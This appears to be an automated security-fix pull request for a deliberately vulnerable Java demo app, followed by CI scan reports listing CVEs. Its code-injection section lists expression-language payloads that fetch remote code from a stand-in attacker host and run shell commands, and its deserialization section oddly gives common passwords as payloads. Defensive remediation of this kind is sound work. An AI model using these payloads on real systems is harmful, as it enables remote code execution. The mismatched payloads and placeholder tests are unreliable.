AutoFix PR

[heyandyj]

Qwiet AI AutoFix

This PR was created automatically by the Qwiet AI AutoFix tool.
As long as it is open, subsequent scans and generated fixes to this same branch will be added to it as new commits.

Each commit fixes one vulnerability.

Some manual intervention might be required before merging this PR.

Project Information

• Name: qwiet-multilang-app
• Branch: master
• Pull Request Language: java

Findings/Vulnerabilities Fixed

Finding 13: Remote Code Execution: Code Injection Through Attacker-controlled Data via foo in SearchController.doGetSearch

Commits/Files Changed

• Changed file src/main/java/io/shiftleft/controller/SearchController.java

Details

Vulnerability Description

Attacker-controlled data is used in a code execution context without undergoing escaping or validation. This indicates a remote code execution vulnerability.

• Severity: critical

• CVSS Score: 9 (critical)

• CWE: CWE-77: Remote Code Execution

Attack Payloads

[
1. "${(new java.net.URL(\"http://attacker-website.com/malicious-script.jsp\")).openConnection().getInputStream().read()}"
2. "${new java.lang.ProcessBuilder('whoami').redirectErrorStream(true).start().getText()}"
3. "${new java.util.jar.URLClassLoader(['http://attacker-website.com/malicious.jar']).loadClass('MaliciousClass').newInstance().execute()}"
4. "${new org.springframework.core.io.UrlResource('http://attacker-website.com/malicious.txt').getInputStream().read()}"
5. "${new java.lang.Runtime().exec('whoami').getText()}"
]

Testcases

@Test
public void testDoGetSearch_WithValidPayload() throws Exception {
    SearchController controller = new SearchController();
    HttpServletResponse response = mock(HttpServletResponse.class);
    HttpServletRequest request = mock(HttpServletRequest.class);

    String result = controller.doGetSearch("${new java.lang.ProcessBuilder('whoami').redirectErrorStream(true).start().getText()}", response, request);

    assertTrue(result.contains("root")); // This test case assumes the system user is 'root'. Adjust accordingly.
}

@Test
public void testDoGetSearch_WithInvalidPayload() throws Exception {
    SearchController controller = new SearchController();
    HttpServletResponse response = mock(HttpServletResponse.class);
    HttpServletRequest request = mock(HttpServletRequest.class);

    String result = controller.doGetSearch("${invalid}", response, request);

    assertFalse(result.contains("root")); // This test case assumes the system user is not 'root'. Adjust accordingly.
}

Please note that these test cases are simplified examples and may not cover all possible scenarios. Actual test cases would depend on the specific requirements and constraints of the application.

Finding 18: Deserialization: Attacker-controlled Data Used in Unsafe Deserialization Function via auth in AdminController.doPostLogin

Commits/Files Changed

• Changed file src/main/java/io/shiftleft/controller/AdminController.java

Details

Vulnerability Description

Attacker-controlled data is deserialized. This indicates an insecure deserialization vulnerability.

• Severity: critical

• CVSS Score: 8 (critical)

• CWE: CWE-502: Deserialization

Attack Payloads

[
1. Password=shiftleftsecret
2. Password=admin
3. Password=123456
4. Password=qwerty
5. Password=password
]

Testcases

Here are five test cases that simulate different scenarios:

@Test
public void testIsAdminWithValidAdminCookie() throws Exception {
    String validAdminCookie = "..."; // Replace with a valid admin cookie
    assertTrue(isAdmin(validAdminCookie));
}

@Test
public void testIsAdminWithValidNonAdminCookie() throws Exception {
    String validNonAdminCookie = "..."; // Replace with a valid non-admin cookie
    assertFalse(isAdmin(validNonAdminCookie));
}

@Test
public void testIsAdminWithInvalidCookie() throws Exception {
    String invalidCookie = "..."; // Replace with an invalid cookie
    assertFalse(isAdmin(invalidCookie));
}

@Test
public void testIsAdminWithNullCookie() throws Exception {
    assertFalse(isAdmin(null));
}

@Test
public void testIsAdminWithEmptyCookie() throws Exception {
    assertFalse(isAdmin(""));
}

Please replace the placeholders with actual values to create valid test cases.

[github-actions]

Checking analysis of application shiftleft-java-demo against 3 build rules.

Using sl version 0.9.2978 (cd6c3e57653597d8de7843297b46b0bfd6563ae4).

Checking findings on scan 1.

Results per rule:

• Allow no critical findings: FAIL
  (52 matched vulnerabilities; configured threshold is 0).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  161	10.0	critical	CVE-2018-14721	FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
  406	10.0	critical	GMS-2022-558	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.
  439	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  452	10.0	critical	GMS-2022-560	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.
  90	9.8	critical	CVE-2017-5929	QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…

  Severity rating	Count
  Critical	52
  High	0
  Medium	0
  Low	0

  Finding Type	Count
  Oss_vuln	43
  Container	7
  Vuln	2

• Allow one OSS or container finding: FAIL
  (267 matched vulnerabilities; configured threshold is 1).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  161	10.0	critical	CVE-2018-14721	FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
  406	10.0	critical	GMS-2022-558	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.
  439	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  452	10.0	critical	GMS-2022-560	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.
  90	9.8	critical	CVE-2017-5929	QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…

  Severity rating	Count
  Critical	50
  High	133
  Medium	79
  Low	5

  Finding Type	Count
  Oss_vuln	200
  Container	67

• Allow no reachable OSS vulnerability: FAIL
  (76 matched vulnerabilities; configured threshold is 0).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  439	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  346	9.8	critical	CVE-2020-1938	When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as havin…
  360	9.8	critical	CVE-2017-5651	In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If…
  365	9.8	critical	CVE-2018-8014	The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure…
  432	9.8	critical	CVE-2018-1270	Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over Web…

  Severity rating	Count
  Critical	8
  High	35
  Medium	32
  Low	1

3 rules failed.

[github-actions]

Checking analysis of application shiftleft-java-demo against 3 build rules.

Using sl version 0.9.2978 (cd6c3e57653597d8de7843297b46b0bfd6563ae4).

Checking findings on scan 1.

Results per rule:

• Allow no critical findings: FAIL
  (52 matched vulnerabilities; configured threshold is 0).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  178	10.0	critical	CVE-2018-14721	FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
  403	10.0	critical	GMS-2022-558	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.
  436	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  449	10.0	critical	GMS-2022-560	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.
  85	9.8	critical	CVE-2017-5929	QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…

  Severity rating	Count
  Critical	52
  High	0
  Medium	0
  Low	0

  Finding Type	Count
  Oss_vuln	43
  Container	7
  Vuln	2

• Allow one OSS or container finding: FAIL
  (267 matched vulnerabilities; configured threshold is 1).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  178	10.0	critical	CVE-2018-14721	FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
  403	10.0	critical	GMS-2022-558	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.
  436	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  449	10.0	critical	GMS-2022-560	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.
  85	9.8	critical	CVE-2017-5929	QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…

  Severity rating	Count
  Critical	50
  High	133
  Medium	79
  Low	5

  Finding Type	Count
  Oss_vuln	200
  Container	67

• Allow no reachable OSS vulnerability: FAIL
  (76 matched vulnerabilities; configured threshold is 0).

  First 5 findings:

  ID	CVSS	Rating	CVE	Title
  436	10.0	critical	GMS-2022-559	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.
  343	9.8	critical	CVE-2020-1938	When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as havin…
  357	9.8	critical	CVE-2017-5651	In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If…
  362	9.8	critical	CVE-2018-8014	The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure…
  429	9.8	critical	CVE-2018-1270	Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over Web…

  Severity rating	Count
  Critical	8
  High	35
  Medium	32
  Low	1

3 rules failed.